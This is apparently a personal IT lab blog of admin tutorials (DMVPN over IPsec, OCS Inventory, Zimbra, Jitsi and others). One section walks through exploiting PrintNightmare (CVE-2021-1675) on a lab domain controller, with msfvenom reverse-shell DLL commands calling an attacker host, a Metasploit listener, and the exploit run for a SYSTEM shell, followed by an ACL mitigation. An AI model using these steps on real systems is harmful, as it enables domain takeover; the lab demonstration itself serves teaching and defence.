Implementing DMVPN over IPSEC

Below is a topology that is used to configure DMVPN over IPSEC. This is one of the most important topics that I have learned on CCNP ENCOR.

HUB Configuration:

int tun 0
ip addr 10.40.1.1 255.255.255.0
ipv6 addr 2001:10:40:1::1/64
ipv6 addr fe80::1 link-local
tu source gig 0/0
tun mode gre multipoint
ip nhrp authentication Cisco123
# Using NHRP to define tunnel destination on remote sites.
ip nhrp network-id 1
ip nhrp map multicast dynamic
ipv6 nhrp network-id 1
ipv6 nhrp map multicast dynamic

SPOKE Configuration:

# Site 1:
int tun 0
ip addr 10.40.1.2 255.255.255.0
ipv6 addr 2001:10:40:1::2/64
ipv6 addr fe80::2 link-local
tu source gig 0/0
tun mode gre multipoint
ip nhrp authentication Cisco123
# Using NHRP to define tunnel destination on remote sites.
ip nhrp network-id 1
ip nhrp nhs 10.40.1.1 nbma 150.40.1.1 multicast

ipv6 nhrp network-id 1
ipv6 nhrp nhs 2001:10:40:1::1 nbma 150.40.1.1 multicast

# Site 2:
int tun 0
ip addr 10.40.1.3 255.255.255.0
ipv6 addr 2001:10:40:1::3/64
ipv6 addr fe80::2 link-local
tu source gig 0/0
tun mode gre multipoint
ip nhrp authentication Cisco123
# Using NHRP to define tunnel destination on remote sites.
ip nhrp network-id 1
ip nhrp nhs 10.40.1.1 nbma 150.40.1.1 multicast

ipv6 nhrp network-id 1
ipv6 nhrp nhs 2001:10:40:1::1 nbma 150.40.1.1 multicast

# Site 3:
int tun 0
ip addr 10.40.1.4 255.255.255.0
ipv6 addr 2001:10:40:1::4/64
ipv6 addr fe80::2 link-local
tu source gig 0/0
tun mode gre multipoint
ip nhrp authentication Cisco123
# Using NHRP to define tunnel destination on remote sites.
ip nhrp network-id 1
ip nhrp nhs 10.40.1.1 nbma 150.40.1.1 multicast

ipv6 nhrp network-id 1
ipv6 nhrp nhs 2001:10:40:1::1 nbma 150.40.1.1 multicast

Using a nice TCLSH script to test connectivity between sites.

tclsh 

foreach X {
10.40.1.1
10.40.1.2
10.40.1.3
10.40.1.4
2001:10:40:1::1
2001:10:40:1::2
2001:10:40:1::3
2001:10:40:1::4
} {ping $X repeat 2}
#sh ip nhrp
# sh ipv6 nhrp  
# sh dmvpn

+ Using IPSec tunnel to protect DMVPN traffic.

  • IKE Configuration
crypto keyring VPN-BCITCISA
 pre-shared-key address 0.0.0.0 0.0.0.0 key Pa$$w0rd

crypto isakmp enable

crypto isakmp policy 10
 encryption aes 256
 hash sha
 authentication pre-share
 group 5

crypto isakmp profile ISAKMP-Profile
 Keyring VPN-BCITCISA
 Match identity address 0.0.0.0
  • IPsec Configuration
crypto ipsec transform-set IPSEC-TRANSFORM esp-aes 256 esp-sha256-hmac

crypto ipsec profile DMVPN
 set security-association lifetime seconds 120
 set transform-set IPSEC-TRANSFORM
 set isakmp-profile ISAKMP-Profile
 set pfs group2
  • Apply the profile to the interface Tunnel0

Interface Tunnel0
tunnel protection ipsec profile DMVPN

+ Verify DMVPN over IPSEC:

#show dmvpn detail
# show crypto isakmp sa
#show crypto ipsec sa
+ Capture DMVPN over IPSEC traffic.
Capture packets from Wireshark. It can be seen that the ping traffic has been encrypted by ESP on the IPSEC tunnel.

Create Office 365 online

Choose your Office 365 package.

Login to Microsoft 365 Admin center.

Add your domain name.

Verify your domain name.

Microsoft will connect to your GoDaddy Service Provider to create DNS records for your domain name.

Check on your GoDaddy domain site, DNS records has been successfully created on GoDaddy.

Change your primary account to admin@tungle.ca.

Change it to unlicensed.

Create a new Admin account on MS 365 Admin Center.

Link your license to your domain name.

Assign permission for this account.

Edit your billing license and extend it to 2 expiring months.

And then select “Extend end date” setting. Your Office 365 license will be expired in the next 2 months.

Install OCS Inventory on Linux

OCS stands for Open Computers and Software Inventory Next Generation. This is an open-source assets management and deployment solution.

Below is a couple of steps to install OCS inventory.

Prerequisites

yum install -y epel-release yum-utils vim wget
wget https://rpms.remirepo.net/enterprise/remi-release-7.rpm --no-check-certificate
wget https://rpm.ocsinventory-ng.org/ocsinventory-release-latest.el7.ocs.noarch.rpm --no-check-certificate
yum install -y ocsinventory-release-latest.el7.ocs.noarch.rpm remi-release-7.rpm
yum-config-manager --enable remi && yum-config-manager --enable remi-php73

Create a .repo file so that MariaDB can be installed.

vim /etc/yum.repos.d/MariaDB.repo

Install the whole bunch of applications and extensions that are required to run OCS 

yum install -y httpd MariaDB-client MariaDB-server perl-Archive-Zip perl-Compress-Zlib perl-DBD-MySQL perl-DBI perl-Mojolicious perl-Net-IP perl-Plack perl-SOAP-Lite perl-Switch perl-XML-Entities perl-XML-Simple php php-cli php-common php-curl php-domxml php-gd php-imap php-intl php-ldap php-mbstring php-mcrypt php-mysql php-mysqlnd php-opcache php-pdo php-pear-CAS php-pecl-apcu php-pecl-zip php-simplexml php-soap php-sodium php-xmlrpc php-zip
yum update && yum upgrade

Install OCS Inventory.

yum install -y ocsinventory

Configure the MariaDB database.

systemctl enable mariadb
systemctl start mariadb

Secure MySQL.

mysql_secure_installation

Create a new an ocsweb database and assign permissions for user ocs/ocs.

mysql -u root -p
MariaDB [(none)]> create database ocsweb;
CREATE USER 'ocs'@'localhost' IDENTIFIED BY 'ocs';
GRANT ALL PRIVILEGES ON ocsweb. * TO 'ocs'@'localhost' IDENTIFIED BY 'ocs';
flush privileges;
exit;

Allow HTTP and HTTPS on Firewall.

firewall-cmd --permanent --add-service=http
firewall-cmd --permanent --add-service=https
firewall-cmd –reload
firewall-cmd --list-services

Configure the MariaDB database.

systemctl enable mariadb && systemctl start mariadb

Setup OCS user/password on OCS configuration/

vim /etc/httpd/conf.d/ocsinventory-server.conf
# Name of database
PerlSetEnv OCS_DB_NAME ocsweb
PerlSetEnv OCS_DB_LOCAL ocsweb
# User allowed to connect to database
PerlSetEnv OCS_DB_USER ocs
# Password for user
PerlSetVar OCS_DB_PWD ocs

Enables and restarts Apache Web Service.

systemctl enable httpd && systemctl start httpd
Check TCP ports are running on the server.
Access OCS Inventory web interface (http://IPaddressofOCS/ocsreports).

Enter user/password is admin/admin to log on.

Rename the “install.php” file in the “OCSReports” directory.

mv /usr/share/ocsinventory-reports/ocsreports/install.php /usr/share/ocsinventory-reports/ocsreports/install.php.bak
+ Install OCS Inventory agent via GPO.

Create a logon script OCSinventory.bat

@echo off
\\dc1.cisalab.local\shared\OCS-Windows-Agent-2.9.0.0_x64\OCS-Windows-Agent-Setup-x64.exe /S /SERVER=http://10.0.0.13/ocsinventory

Create a new GPO and link the script to the domain level.

Restart Windows 10 domain-joined machine.

OCS inventory agent has been automatically installed on this machine.

Check TCP connection from Windows 10 machine to OCS Inventory server.

Get-NetTcpConnection -RemoteAddress 10.0.0.13

Lab Demonstration for Windows Print Spooler 0day Exploit on CVE-2021-1675

References:

https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution

The exploit code

https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py

Step1: Setup the Lab

1 DC1 (dc1.cisalab.local) is running Windows 2016 with IP address is 10.0.0.77

Print Spooler service is running on the DC.

1 Kali Linux (AT) with IP address is 10.0.0.191.

Step 2: How to set up Kali

Upgrade Python

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install python3-venv

1. The best practice is to create Python virtual Environment

python3 -m venv PrintNightmare

source PrintNightmare/bin/activate

2. clone the repo and install the custom Impacket version:

git clone https://github.com/cube0x0/CVE-2021-1675.git

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

3. Set up SMB share

(Use this method to allow the Windows servers to download the malicious codes on AT machine)

copy the original smb.conf file and create a backup file

cp /etc/samba/smb.conf /etc/samba/smb.conf.bak

now on the smb.conf change to this new configuration File

[global]

map to guest = Bad User

server role = standalone server

usershare allow guests = yes

idmap config * : backend = tdb

smb ports = 445 [smb]

comment = Samba

path = /tmp/

guest ok = yes

read only = no

browsable = yes

force user = nobody

Spin up SMB share: impacket-smbserver smb /tmp/

In case you have some problems with the SMB try to use build-in SMBD service

service smbd start

service smbd restart

4. Payload Creation:

Create Reverse shell Payload as a DLL 

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR AT IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll

AT creates a reverse shell connection with IP address is 10.0.0.191 (AT) and the destination port is 443. The shell code will be dropped on the Windows servers on /tmp/reverse.dll 

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=10.0.0.191 LPORT=443 -o /tmp/reverse.dll

5. Set up a listener Use Metasploit tool to create a revere shell session (a listener)

msfconsole

use multi/handler

set PAYLOAD windows/x64/shell_reverse_tcp

set LHOST 10.0.0.191

set LPORT 443 run

6. Windows Environment:

you need to create a dc with an active directory (cisalab.local) create a low privilege user (test/123456)

7. Download and run shellcode

python3 CVE-2021-1675.py tle:123456@10.0.0.77 ‘\\10.0.0.191\smb\reverse.dll’

AT will create a connection to Windows server (DC1 – 10.0.0.77) with username/password is tle/123456.

Then the malicious code will be downloaded and run from the AT machine (\\10.0.0.191\smb\reverse.dll). After that, if the shellcode works then a reverse shell connection from Windows server to AT machine.

Step 3. Live Demonstration

The shell code is running on the AT machine

python3 CVE-2021-1675.py cisalab.local/tle:123456@10.0.0.77 '\\10.0.0.191\smb\reverse.dll'

The malicious code is downloaded but it is blocked by Windows Defender on Windows servers

So, the shellcode cannot run on the Windows servers with Windows Defenders which is running.

If Windows Defender is disabled.

Run the exploit code again.

We can see a reverse shell connection has been established on the Windows server (DC) and AT machine. The connection seems to be an HTTPS connection, so it is hard to detect because of encryption.

The AT has a cmd shell with SYSTEM permission on the victim machine. That means the AT can do everything on it. Checking on Windows server (DC1), trojan code has been created on DC1 under x64 directory on “C:\Windows\System32\spool\drivers\”.

The shell code (reverse.dll) is successfully dropped on the folder named “3”. It may be a name when AT has created a reverse shell session.

Step 4: PREVENTION when the print spooler service is still running

Using PowerShell to create a ACL to prevent the malicious code to drop on the “C:\Windows\System32\spool\drivers\”

https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/

Before applying the ACL.

After implementing the ACL.

By restricting the ACLs on this directory (and subdirectories) we can prevent malicious DLLs to be introduced by the print spooler service. The exploit works by dropping a DLL in a subdirectory under C:\Windows\System32\spool\drivers.

Run the exploit code again.

The trojan code cannot put its files on the directory (“RPRN SessionError: code: 0x3 – ERROR_PATH_NOT_FOUND – The system cannot find the path specified.”).

There is no trojan code has put on the directory.

Install PSWindowsupdates module via GPO

Create a GPO “Install PSWindowsUpdates Module”.

Actions Settings:

Program: %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

Arguments: -ExecutionPolicy Bypass -File \DC1\Shared\install-PSWindowsupdate.PS1

Set-ExecutionPolicy RemoteSigned
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Set-PSRepository -Name 'PSGallery' -InstallationPolicy Trusted
Install-Module PSWindowsUpdate -Force

On Windows 10 PC:

Restarts the machine.

The task is running.

Check Task Manager and see PowerShell is running.

# Check PSWindowsUpdates has been installed.
Get-InstallModule

Create another GPO for installing Windows updates via the PSWindowsUpdates module.

Arguments: -ExecutionPolicy Bypass -File \\DC1\Shared\NewPS.PS1

PSWindowsUpdates script (\\DC1\Shared\newPS.PS1)

# This is PowerShell script to force on installing Windows Updates via PSWindowsUpdate on Windows machines
# https://www.powershellgallery.com/packages/PSWindowsUpdate/2.2.0.2
# It is created by Tung on 2021-Sep-28
# Allow PowerShell to be run on Windows machines with PSWindowsUpdate module
Set-ExecutionPolicy RemoteSigned
# Installs everything (newest version) along with required modules.
#Install-Module PSWindowsUpdate
# Import Module PSWindowsUpdate before running the script
Import-Module -Name PSWindowsUpdate
#Force Windows updates are completely downloaded, installed and then restarted. Will check if we have a WSUS server
Install-WindowsUpdate -AcceptAll -AutoReboot

# Send an email after running PSWindowsUpdate command
# Will send email if the last previous command is successful. 
if ($? -eq $True){
	# Use this command for TLS requirement
	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
	# Get machine name 
	$machinename = get-content env:computername
	# Get current date and time
	$currentdate = get-date
	# SMTP server of Outlook.com
	$SMTP = "smtp-mail.outlook.com"
	# Mail from
	$From = "youremail"
	# Rcpt to 
	$To = "youremail"
	# Subject line 
	$Subject = "Windows updates on $cname"
	# Email body
	$Body = "Finising running Windows updates on $machinename on $currentdate"
	# Create  a connection to SMTP Outlook via the port 587
	$Email = New-Object Net.Mail.SmtpClient($SMTP, 587)
	# Enable SSL for the connection
	$Email.EnableSsl = $true
	# Log in to Outlook mail server with your credential
	$Email.Credentials = New-Object System.Net.NetworkCredential("youremail", "yourpassword");
	# Send email syntax
	$Email.Send($From, $To, $Subject, $Body)
}

Windows 10:

Access denied when trying .ADMX files to copy PolicyDefinitions folder

After downloading a new Windows 10 Administrative Templates, I need to copy it to the PolicyDefinitions folder on your Domain Controller. Then, I got an error because of “Cannot copy – permission denied”.

https://www.microsoft.com/en-us/download/confirmation.aspx?id=103667

The workaround solution is going to ” C:\Windows\SYSVOL\sysvol ” folder directly instead of using \\SERVER\SYSVOL.

My destination folder:

C:\Windows\SYSVOL\sysvol\cisalab.local\Policies\PolicyDefinitions\en-US

.ADMX files.

.ADML files.

Open GPMC console, we can see a new Windows 10 Administrative Template has been applied in Domain controller.

Create a NAT interface on MS Hyper-V

Open PowerShell.

New-VMSwitch -name NAT-Switch -SwitchType Internal -Verbose

Check the NAT interface has been created on Hyper-V.

Get-NetAdapter

Create an IP pool for the NAT interface.

New-NetIPAddress -IPAddress 192.168.200.1 -PrefixLength 24 -InterfaceIndex 71 -Verbose

Create a subnet for the NAT interface.

Check the Network cards setting.

Bind the network adapter card to the NAT network.

Install OpenProject on CentOS 7

Create a CentOS 7 VPS.

Update your system & disable SELinux

Start the installation by updating system packages to the latest release.

#sudo yum -y update

Next, disable SELinux in CentOS

edit /etc/selinux/config file and run a command setenforce 0 to disable SELinux in CentOS.

Reboot Linux VPS server.

Add the OpenProject Repository

Next is to add OpenProject Repository by executing the below commands in your terminal.

# sudo yum -y install wget # sudo wget -O /etc/yum.repos.d/openproject.repo https://dl.packager.io/srv/opf/openproject/dev/installer/el/7.repo

Install OpenProject on CentOS 7

Run the commands below to install OpenProject on CentOS 7 # sudo yum -y install openproject

Run the command below to configure OpenProject

#sudo openproject configure Select “Install a new PostgreSQL server and database locally”

Select “Install Apache2 server”

Choose Sendmail application as the default send email service on CentOS.

Enter admin email to be used for access and notifications.

Choose to install Memcache server.

The installation was failed because the issue below

Run the command below to generate a self-signed certificate for OpenProject. # sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/certs/openproject.cisa2380.tk.key -out /etc/ssl/certs/openproject.cisa2380.tk.crt

# mkdir /etc/ssl/private/

# cp /etc/ssl/certs/openproject.cisa2380.tk.key /etc/ssl/private/

Run the command below to complete the installation

#sudo openproject reconfigure

Allow port 80 and 443 on the CentOS firewall.

After finishing OpenProject installation, log into OpenProject with default user/password is admin/admin.

Install certbot on OpenProject.

Restart Apache web service.

# cat /etc/httpd/conf.d/openproject.conf

Log into the OpenProject and see the interface will be redirected to HTTPS.

Installing Zimbra Collaboration Suite (ZCS) on CentOS 7

This tutorial describes how to install Zimbra Collaboration Suite Open Source Edition on a CentOS/RHEL 7 VPS server.

Step 1: Create both A and MX records for Zimbra Mail Server. Create both A and MX records on the VPS to point to your Zimbra mail server

Step 2: Install System Packages for Zimbra

Login as a root account to install the following packages below:

# yum -y install unzip net-tools sysstat openssh-clients perl-core libaio nmap-ncat libstdc++.so.6

Next, disable SELinux in CentOS. Edit /etc/selinux/config file and run a command setenforce 0 to disable SELinux in CentOS

Install wget package:

# yum install wget

Set hostname on Zimbra host. # hostnamectl set-hostname mail

Disable unwanted services. Postfix mail service has already been installed and run on CentOS. We need to disable and remove the postfix service before installing Zimbra.

# systemctl stop postfix

# systemctl disable postfix

# yum remove postfix

Step 3: Install Zimbra Collaboration Suite Open Source Edition # wget https://files.zimbra.com/downloads/8.8.15_GA/zcs-8.8.15_GA_3869.RHEL7_64.20190918004220.tgz

After the download completes, use unzip command to extract the archive

# tar xfz zcs-8.8.15_GA_3953.RHEL8_64.20200629025823.tgz

# cd zcs-8.8.15_GA_3953.RHEL8_64.20200629025823/ # ls

Run the command install.sh to install Zimbra. After a series of system checks, click y in continue installation

# ./install.sh

Next, the installation process will prompt a couple of questions that we need to choose to configure Zimbra properly.

Finally, it will start the Zimbra installation process. The system will be modified.  Continue? [N] y

Allow Zimbra services on Linux Firewall.

Step 4: Zimba Initial Configuration. After the installation finishes, access the Zimbra administration page via a link https://mail.cisa2380.tk:7071 or https://172.105.5.143:7071

Step 5: Create 500 Zimbra test users:

#su – zimbra

$cd /opt/mail/backup

$touch usercreation.sh

$nano usercreation.sh

[zimbra@mail backup]$ more usercreation.sh

#!/bin/bash

# Generate user list

#cd /var/tmp

x=1

while [ $x -lt 501 ] do

echo “ca demo$x@cisa2380.tk ‘@zimbra@password’ cn ‘Demo User${x}’ givenName ‘Demo’ zimbraPrefFromDisplay ‘Demo User${x}'” >> userlist.zmp

x=`expr $x + 1` done

# run the script ./usercreation.sh

Next, use the command below to create 500 Zimbra users from the userlist.zmp file $zmprov -f userlist.zmp

List down all Zimbra accounts with zmprov command $zmprov -l gaa

Checking on Zimbra Administration.

Step 6: Evaluate Zimbra performance by simulating concurrent Zimbra user’s login.

—-

[root@li1978-114 tmp]# cat usersimulate.sh

#!/bin/bash

# Simulate user login

# x start from 1 and end with 500

#x=1

for x in {1..500}

do

    curl -v -k ‘https://mail.cisa2380.tk/’ -H ‘Cookie: ZM_TEST=true’ –data ‘loginOp=login&username=demo$x@cisa2380.tk&password=@zimbrapassword’

    sleep 1s done

—-

Installing Jitsi Meet on Ubuntu

Jitsi is a true open-source solution for video conferencing. Integrating with Zimbra Collaboration Suite, we have a feasible open-source collaboration solution that has been installed on Linux VPS servers.

Step 1 — Setting the System Hostname Creates jitsi and auth hostname records on an external DNS server as screenshots below

Change hostname of the machine to jitsi.cisa2380.tk.

#sudo hostnamectl set-hostname jitsi.cisa2380.tk

Ping the hostname to check it is reachable.

Step 2 — Configuring the Firewall

Allow some ports below for Jitsi services on Ubuntu Linux Firewall.

Port 80 : uses in the TLS certificate request.

Port 443: uses for the conference room creation web page.

Port 4443/tcp 10000/udp: uses to transmit and receive the encrypted call traffic.

sudo ufw allow 80/tcp

sudo ufw allow 443/tcp

sudo ufw allow 4443/tcpsudo ufw allow 10000/udp

Step 3 — Installing Jitsi Meet

First, download the Jitsi GPG key with the wget downloading utility:

#wget https://download.jitsi.org/jitsi-key.gpg.key

#sudo nano /etc/apt/sources.list.d/jitsi-stable.list to add this line below to the file for the Jitsi repository:deb https://download.jitsi.org stable/

Finally, perform a system update to collect the package list from the Jitsi repository #sudo apt update

Install Jitsi meet with the command below.

#sudo apt install jitsi-meet

Enter the domain name for your Jitsi Meet instance.

Select the option below to create and use a self-signed TLS certificate for Jitsi system.

Step 4 — Obtaining a Signed TLS Certificate

#sudo apt install certbot

#sudo apt install certbot

Step 5 — Locking Conference Creation

Allow registered users to create conference rooms by changing the information as the file below

#sudo nano /etc/prosody/conf.avail/your_domain.cfg.lua

Change authentication = “anonymous” to authentication = “internal_plain”

Then, add to the end of the file:

VirtualHost “guest.jitsi.your_domain”

    authentication = “anonymous”     c2s_require_encryption = false

Next, edit the file /etc/jitsi/meet/jitsi.your_domain-config.js 

#sudo nano /etc/jitsi/meet/jitsi.your_domain-config.js

Change this line:

// anonymousdomain: ‘guest.jitsi.your_domain’,

To: anonymousdomain: ‘guest.jitsi.your_domain’,

Open /etc/jitsi/jicofo/sip-communicator.properties:

#sudo nano /etc/jitsi/jicofo/sip-communicator.properties

Add the line below to the end of the file. org.jitsi.jicofo.auth.URL=XMPP:jitsi.your_domain

Now, Jitsi Meet is configured to require authenticated users for video conferencing.

Use the prosodyctl utility to create user and password for Jitsi users.

#sudo prosodyctl register user your_domain password

Finally, restart the Jitsi Meet services.

sudo systemctl restart prosody.service

sudo systemctl restart jicofo.service sudo systemctl restart jitsi-videobridge2.service

The Jitsi server has been installed and securely configured.